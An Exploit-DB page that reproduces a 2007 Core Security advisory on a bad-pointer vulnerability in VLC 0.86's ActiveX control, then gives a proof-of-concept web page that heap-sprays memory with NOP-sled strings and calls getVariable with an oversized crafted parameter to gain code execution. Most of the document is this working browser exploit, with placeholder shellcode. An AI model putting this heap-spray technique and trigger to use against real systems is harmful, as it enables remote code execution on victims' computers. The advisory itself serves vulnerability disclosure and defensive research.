VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization

EDB-ID:

4688




Platform:

Windows

Date:

2007-12-04


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

<!--
       Core Security Technologiess - CoreLabs Advisory
            http://www.coresecurity.com/corelabs

    VLC Activex Bad Pointer Initialization Vulnerability

*Advisory Information*
Title: VLC Activex Bad Pointer Initialization Vulnerability
Advisory ID: CORE-2007-1004
Advisory URL: http://www.coresecurity.com/?action=item&id=2035
Date published: 2007-12-04
Date of last update: 2007-12-03
Vendors contacted: VLC
Release mode: Coordinated Release

*Vulnerability Description*
VLC player is a popular multimedia player for various audio and video
formats, and various streaming protocols.

A vulnerability has been found in the ActiveX control DLL (axvlc.dll)
used by VLC player. This library contains three methods whose parameters
are not correctly checked, and may produce a bad initialized pointer. By
providing these functions specially crafted parameters, an attacker can
overwrite memory zones and execute arbitrary code.

*Vulnerable packages*
VLC media player version 0.86, 0.86a, 0.86b y 0.86c.
-->

<html>
<head>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'
id='target' ></object>
</head>
<body>
   <script>
      var mm  = null;

      if( target != null )
      {
         var param1 = unescape("%u0505%u0505");
         var salame = "defaultV";
         var salame2 = 1;
         var salame3 = 0;

         ag   = unescape("%uCCCC%uCCCC");
         sh   =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%");
         sz   = sh.length * 2;
         npsz = 0x400000 - (sz + 0x38);
         nps  = unescape("%u0505%u0505");

         while(nps.length * 2 < npsz) nps += nps;
         ihbc = (0x0E000000 - 0x400000) / 0x400000;
         mm   = new Array();

         for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

         for(var i=0;i<2000;i++)
            param1 = param1 + unescape("%u0505%u0505");
					
         target.getVariable (param1);
      }
   </script>
</body>
</html>

# milw0rm.com [2007-12-04]